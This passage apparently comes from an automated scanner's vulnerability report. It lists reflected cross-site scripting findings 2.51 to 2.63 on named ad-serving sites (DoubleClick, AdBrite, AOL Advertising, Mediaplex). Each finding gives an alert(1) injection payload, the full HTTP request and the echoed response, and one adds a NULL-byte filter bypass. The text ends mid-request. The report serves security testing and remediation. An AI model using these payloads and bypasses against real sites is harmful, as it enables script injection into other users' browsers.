net/click%3Bh%3Dv8/3b58/f/6c/%2a/v%3B241902957%3B1-0%3B0%3B64699383%3B4307-300/250%3B42386233/42404020/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=&82770"-alert(1)-"08e18e3c776=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D318%26migSource%3Dadsrv2%26migTrackDataExt%3D2986074%3B64699383%3B241902957%3B42386233%26migRandom%3D8182521%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B
...[SNIP]...

2.51. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.50

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %001abfd'-alert(1)-'25a80048a19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1abfd'-alert(1)-'25a80048a19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4892.160904.MMNUK/B5353379.50;sz=300x250;ord=167811409?click=http://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=&%001abfd'-alert(1)-'25a80048a19=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9EVH&cb=152584448
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38219
Date: Wed, 03 Aug 2011 12:38:33 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
/click%3Bh%3Dv8/3b58/f/6f/%2a/d%3B241902957%3B0-0%3B0%3B64699383%3B4307-300/250%3B42385532/42403319/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=&%001abfd'-alert(1)-'25a80048a19=1http://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;64699383;241902957;42385532&migRandom=8189708&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.c
...[SNIP]...

2.52. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.50 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.50

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e90f"-alert(1)-"03a907c1eb9 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.50;sz=300x250;ord=167811409?click=http://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=1e90f"-alert(1)-"03a907c1eb9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9EVH&cb=152584448
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6681
Date: Wed, 03 Aug 2011 12:38:09 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.net/click%3Bh%3Dv8/3b58/7/69/%2a/v%3B241902957%3B1-0%3B0%3B64699383%3B4307-300/250%3B42386233/42404020/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/194453605.221128427/115052958/direct/01%3fhref=1e90f"-alert(1)-"03a907c1eb9http://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;64699383;241902957;42386233&migRandom=8166489&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.com
...[SNIP]...

2.53. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.57

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22967'-alert(1)-'2808f7e3313 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.57;sz=300x250;ord=180924475?click=http://clk.atdmt.com/goiframe/228371382.223068212/msnkxmbu0010002154mbu/direct/01%3fhref=&22967'-alert(1)-'2808f7e3313=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38250
Date: Wed, 03 Aug 2011 12:40:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
h%3Dv8/3b58/f/78/%2a/i%3B242161132%3B2-0%3B0%3B64928197%3B4307-300/250%3B42594883/42612670/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/228371382.223068212/msnkxmbu0010002154mbu/direct/01%3fhref=&22967'-alert(1)-'2808f7e3313=1http://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;64928197;242161132;42594883&migRandom=8319005&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.c
...[SNIP]...

2.54. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.57

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5546"-alert(1)-"e555e509462 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.57;sz=300x250;ord=180924475?click=http://clk.atdmt.com/goiframe/228371382.223068212/msnkxmbu0010002154mbu/direct/01%3fhref=&e5546"-alert(1)-"e555e509462=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38226
Date: Wed, 03 Aug 2011 12:40:37 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
h%3Dv8/3b58/f/78/%2a/f%3B242161132%3B3-0%3B0%3B64928197%3B4307-300/250%3B42594935/42612722/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/228371382.223068212/msnkxmbu0010002154mbu/direct/01%3fhref=&e5546"-alert(1)-"e555e509462=1";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1311850514314.uniqueId;
this.thirdPartyImpUrl = "http://t.mookie1.com/t
...[SNIP]...

2.55. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.57

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f2d4"-alert(1)-"778cdb0a564 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.57;sz=300x250;ord=180924475?click=http://clk.atdmt.com/goiframe/228371382.223068212/msnkxmbu0010002154mbu/direct/01%3fhref=5f2d4"-alert(1)-"778cdb0a564 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38219
Date: Wed, 03 Aug 2011 12:40:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
Bh%3Dv8/3b58/7/75/%2a/e%3B242161132%3B1-0%3B0%3B64928197%3B4307-300/250%3B42594325/42612112/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/228371382.223068212/msnkxmbu0010002154mbu/direct/01%3fhref=5f2d4"-alert(1)-"778cdb0a564";
this.clickN = "";
this.type = type;
this.uniqueId = plcrInfo_1311850530833.uniqueId;
this.thirdPartyImpUrl = "http://t.mookie1.com/t/v
...[SNIP]...

2.56. http://ad.doubleclick.net/adi/N4892.160904.MMNUK/B5353379.57 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4892.160904.MMNUK/B5353379.57

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21936'-alert(1)-'24eb2c9dc0e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4892.160904.MMNUK/B5353379.57;sz=300x250;ord=180924475?click=http://clk.atdmt.com/goiframe/228371382.223068212/msnkxmbu0010002154mbu/direct/01%3fhref=21936'-alert(1)-'24eb2c9dc0e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/MBU/iview/msnkxmbu0010002154mbu/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 38243
Date: Wed, 03 Aug 2011 12:40:20 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
Bh%3Dv8/3b58/7/75/%2a/w%3B242161132%3B0-0%3B0%3B64928197%3B4307-300/250%3B42594305/42612092/2%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/228371382.223068212/msnkxmbu0010002154mbu/direct/01%3fhref=21936'-alert(1)-'24eb2c9dc0ehttp://t.mookie1.com/t/v1/clk?migAgencyId=318&migSource=adsrv2&migTrackDataExt=2986074;64928197;242161132;42594305&migRandom=8297396&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.sky.com
...[SNIP]...

2.57. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97050<script>alert(1)</script>4fedb100f0e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/71138497050<script>alert(1)</script>4fedb100f0e?d=7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0&cb=0.13243940961547196 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/linkedin.dart/fjs_results;optout=false;lang=en;tile=2;sz=728x90;;extra%3Dnull;s=0;ord=691408033?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Tue, 02 Aug 2011 20:21:09 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/71138497050<script>alert(1)</script>4fedb100f0e

2.58. http://advertising.aol.com/privacy/advertisingcom/opt-out [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /privacy/advertisingcom/opt-out

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f97f"-alert(1)-"44214e1d902 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy5f97f"-alert(1)-"44214e1d902/advertisingcom/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 07 Aug 2011 01:26:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=3880879a759c2d9745d71e05c9372db7; expires=Tue, 30 Aug 2011 04:59:33 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 07 Aug 2011 01:26:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/privacy5f97f"-alert(1)-"44214e1d902/advertisingcom/opt-out";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="ja
...[SNIP]...

2.59. http://advertising.aol.com/privacy/advertisingcom/opt-out [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /privacy/advertisingcom/opt-out

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4826"-alert(1)-"40d26245d6c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/advertisingcome4826"-alert(1)-"40d26245d6c/opt-out HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 07 Aug 2011 01:26:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=b5291c6f55dad402347af10e85d6ee7f; expires=Tue, 30 Aug 2011 05:00:14 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 07 Aug 2011 01:26:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/privacy/advertisingcome4826"-alert(1)-"40d26245d6c/opt-out";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adver
...[SNIP]...

2.60. http://advertising.aol.com/privacy/advertisingcom/opt-out [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /privacy/advertisingcom/opt-out

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1485e"-alert(1)-"a67cc2ba52e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/advertisingcom/opt-out1485e"-alert(1)-"a67cc2ba52e HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 07 Aug 2011 01:27:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=e1d91ef2dae8a39fd0878dd64795bd2f; expires=Tue, 30 Aug 2011 05:00:47 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 07 Aug 2011 01:27:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 25793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/privacy/advertisingcom/opt-out1485e"-alert(1)-"a67cc2ba52e";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertising.a
...[SNIP]...

2.61. http://advertising.aol.com/privacy/advertisingcom/opt-out [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /privacy/advertisingcom/opt-out

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a87d"-alert(1)-"2468124b9ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy/advertisingcom/opt-out?9a87d"-alert(1)-"2468124b9ba=1 HTTP/1.1
Host: advertising.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 07 Aug 2011 01:25:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=71415f9fc417a83130a7b85d83ac497d; expires=Tue, 30 Aug 2011 04:58:50 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 07 Aug 2011 01:25:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 34802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/privacy/advertisingcom/opt-out?9a87d"-alert(1)-"2468124b9ba=1";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Privacy/Advertising.com/Opt-Out";
s_265.channel="us.aolad";
s_265.linkInternalFilte
...[SNIP]...

2.62. http://altfarm.mediaplex.com/ad/fm/12741-112746-27909-3 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/12741-112746-27909-3

Issue detail

The value of the mpt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddc0c"><script>alert(1)</script>2db2f9db80f was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/fm/12741-112746-27909-3?mpt=5502339ddc0c"><script>alert(1)</script>2db2f9db80f&mpvc=http://clk.atdmt.com/go/341542882/direct;wi.300;hi.250;ai.227560320.184762796;ct.1/01?href= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/D6I/iview/341542882/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=12309:21584

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Content-Type: text/html
Content-Length: 406
Date: Tue, 02 Aug 2011 19:03:14 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://clk.atdmt.com/go/341542882/direct;wi.300;hi.250;ai.227560320.184762796;ct.1/01?href=http://altfarm.mediaplex.com/ad/ck/12741-112746-27909-3?mpt=5502339ddc0c"><script>alert(1)</script>2db2f9db80f">
...[SNIP]...

2.63. http://altfarm.mediaplex.com/ad/fm/12741-112746-27909-3 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/fm/12741-112746-27909-3

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 777c2"><script>alert(1)</script>7fa5842055d was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad/fm/12741-112746-27909-3?mpt=5502339&mpvc=http://clk.atdmt.com/go/341542882/direct;wi.300;hi.250;ai.227560320.184762796;ct.1/01?href=777c2"><script>alert(1)</script>7fa5842055d HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/D6I/iview/341542882/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
